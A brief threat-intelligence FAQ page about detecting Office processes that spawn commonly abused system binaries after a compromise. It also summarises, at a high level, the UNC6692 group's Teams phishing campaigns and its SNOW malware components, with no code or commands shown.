Office processes spawning commonly abused LOLbins — detection and tuning needed
Key Questions
What are Office LOLbin chains in post-compromise scenarios?
Office processes spawning commonly abused LOLbins (living-off-the-land binaries) indicate post-compromise activity requiring detection and tuning. Production KQL queries and analytic rules help identify these chains. MITRE ATT&CK mappings and AI anomalies enhance detection.
What is the UNC6692 threat group activity?
UNC6692 uses Teams phishing with spam floods, fake IT support messages, AutoHotKey, and SNOW malware for data theft and lateral movement. Campaigns involve rogue extensions and cloud services. SnowBelt provides persistence, SnowGlaze tunneling, and SnowBasin backdoor functionality.
How does SNOW malware factor into Teams attacks?
SNOW malware is deployed via UNC6692's Teams phishing to steal data and enable persistence. It integrates with extensions like SnowBelt for extended persistence, SnowGlaze for tunneling, and SnowBasin as a backdoor. EDR policies and KQL rules are recommended for detection.
Office LOLbin chains post-compromise incl. UNC6692 Teams/SNOW (SnowBelt ext persistence, SnowGlaze tunnel, SnowBasin backdoor) extensions. Production KQL/analytic rules, EDR policies; MITRE KQL + AI anomalies.